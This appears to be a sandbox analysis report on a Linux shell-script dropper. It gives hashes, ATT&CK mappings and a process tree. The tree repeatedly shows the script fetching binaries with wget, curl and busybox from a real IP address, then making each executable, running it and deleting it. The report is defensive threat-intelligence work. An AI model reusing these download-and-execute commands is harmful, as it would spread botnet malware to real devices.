d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76

Analysis

max time kernel
23s
max time network
25s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20/11/2024, 03:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
Size

10KB
MD5

60d3e08d3789ef89393cd2b3a31e61be
SHA1

cc287b71403fb4ac25bc50ebbe29aad36a61ecae
SHA256

d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76
SHA512

62c179d023d47de2cb4be463d9c5a8d03363ef90880ef4b318132eb7fe9d8d14c76bc9214ca67ac52958c066a0858a5893842b02ea9fe22a60e78accf5a03c37
SSDEEP

192:m/L5dFkBBQh7DH7xvx7xWpRF8s808UBdB7EMtk7/Lj8ET7Awp/LYLvfJpwaz3MBO:mhFZtWpRuJBUBdBWD5gQZtWpR2JBUBdf

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 19 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
854	chmod
860	chmod
693	chmod
848	chmod
737	chmod
783	chmod
703	chmod
718	chmod
768	chmod
774	chmod
812	chmod
826	chmod
676	chmod
687	chmod
836	chmod
842	chmod
866	chmod
760	chmod
798	chmod

Executes dropped EXE 19 IoCs

Checks CPU configuration 1 TTPs 19 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 38 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
869	wget
708	wget
712	curl
716	busybox
719	g94Q6IpdHco1kY4euvU50notlQI0EU32gd
721	rm

Writes file to tmp directory 19 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB	curl
File opened for modification	/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL	curl
File opened for modification	/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ	curl
File opened for modification	/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2	curl
File opened for modification	/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0	curl
File opened for modification	/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg	curl
File opened for modification	/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk	curl
File opened for modification	/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0	curl
File opened for modification	/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk	curl
File opened for modification	/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2	curl
File opened for modification	/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy	curl
File opened for modification	/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs	curl
File opened for modification	/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1	curl
File opened for modification	/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1	curl
File opened for modification	/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd	curl
File opened for modification	/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ	curl
File opened for modification	/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV	curl
File opened for modification	/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO	curl
File opened for modification	/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy	curl

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
1⤵
PID:650
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:653
- /usr/bin/wget
  wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  PID:657
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:665
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  PID:673
- /bin/chmod
  chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  - File and Directory Permissions Modification
  PID:676
- /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  ./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  - Executes dropped EXE
  PID:677
- /bin/rm
  rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  PID:678
- /usr/bin/wget
  wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  PID:680
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:684
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  PID:686
- /bin/chmod
  chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  - File and Directory Permissions Modification
  PID:687
- /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  ./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  - Executes dropped EXE
  PID:688
- /bin/rm
  rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  PID:689
- /usr/bin/wget
  wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  PID:690
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:691
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  PID:692
- /bin/chmod
  chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  - File and Directory Permissions Modification
  PID:693
- /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  ./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  - Executes dropped EXE
  PID:694
- /bin/rm
  rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  PID:695
- /usr/bin/wget
  wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  PID:696
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  PID:701
- /bin/chmod
  chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  ./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  - Executes dropped EXE
  PID:705
- /bin/rm
  rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  PID:706
- /usr/bin/wget
  wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - System Network Configuration Discovery
  PID:708
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:712
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - System Network Configuration Discovery
  PID:716
- /bin/chmod
  chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  ./g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:719
- /bin/rm
  rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - System Network Configuration Discovery
  PID:721
- /usr/bin/wget
  wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:725
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  2⤵
  PID:732
- /bin/chmod
  chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  ./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  2⤵
  - Executes dropped EXE
  PID:739
- /bin/rm
  rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
  2⤵
  PID:741
- /usr/bin/wget
  wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  2⤵
  PID:742
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  2⤵
  PID:756
- /bin/chmod
  chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  ./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  2⤵
  - Executes dropped EXE
  PID:761
- /bin/rm
  rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
  2⤵
  PID:762
- /usr/bin/wget
  wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  PID:763
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:765
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  PID:767
- /bin/chmod
  chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  ./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  - Executes dropped EXE
  PID:769
- /bin/rm
  rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  PID:770
- /usr/bin/wget
  wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  2⤵
  PID:771
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:772
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  2⤵
  PID:773
- /bin/chmod
  chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  2⤵
  - File and Directory Permissions Modification
  PID:774
- /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  ./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  2⤵
  - Executes dropped EXE
  PID:775
- /bin/rm
  rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
  2⤵
  PID:776
- /usr/bin/wget
  wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  2⤵
  PID:777
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:778
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  2⤵
  PID:781
- /bin/chmod
  chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  ./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  2⤵
  - Executes dropped EXE
  PID:785
- /bin/rm
  rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
  2⤵
  PID:786
- /usr/bin/wget
  wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  2⤵
  PID:787
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:791
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  2⤵
  PID:796
- /bin/chmod
  chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  2⤵
  - File and Directory Permissions Modification
  PID:798
- /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  ./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  2⤵
  - Executes dropped EXE
  PID:800
- /bin/rm
  rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
  2⤵
  PID:801
- /usr/bin/wget
  wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  2⤵
  PID:810
- /bin/chmod
  chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  ./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
  2⤵
  PID:815
- /usr/bin/wget
  wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  2⤵
  PID:817
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:820
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  2⤵
  PID:823
- /bin/chmod
  chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  ./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  2⤵
  - Executes dropped EXE
  PID:827
- /bin/rm
  rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
  2⤵
  PID:829
- /usr/bin/wget
  wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  2⤵
  PID:830
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  2⤵
  PID:835
- /bin/chmod
  chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  ./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  2⤵
  - Executes dropped EXE
  PID:837
- /bin/rm
  rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
  2⤵
  PID:838
- /usr/bin/wget
  wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  PID:839
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:840
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  PID:841
- /bin/chmod
  chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  - File and Directory Permissions Modification
  PID:842
- /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  ./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  - Executes dropped EXE
  PID:843
- /bin/rm
  rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
  2⤵
  PID:844
- /usr/bin/wget
  wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  PID:845
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:846
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  PID:847
- /bin/chmod
  chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  - File and Directory Permissions Modification
  PID:848
- /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  ./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  - Executes dropped EXE
  PID:849
- /bin/rm
  rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
  2⤵
  PID:850
- /usr/bin/wget
  wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  PID:851
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:852
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  PID:853
- /bin/chmod
  chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  ./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  - Executes dropped EXE
  PID:855
- /bin/rm
  rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
  2⤵
  PID:856
- /usr/bin/wget
  wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  PID:857
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:858
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  PID:859
- /bin/chmod
  chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  ./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
  2⤵
  PID:862
- /usr/bin/wget
  wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  PID:863
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  PID:865
- /bin/chmod
  chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  ./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  - Executes dropped EXE
  PID:867
- /bin/rm
  rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
  2⤵
  PID:868
- /usr/bin/wget
  wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
  2⤵
  - System Network Configuration Discovery
  PID:869

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk	677	fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2	688	QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy	694	CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0	705	RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd	719	g94Q6IpdHco1kY4euvU50notlQI0EU32gd
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg	739	0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs	761	4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1	769	c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ	775	Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB	785	Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV	800	fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL	814	d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO	827	l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ	837	HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy	843	CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk	849	fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2	855	QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1	861	c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0	867	RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads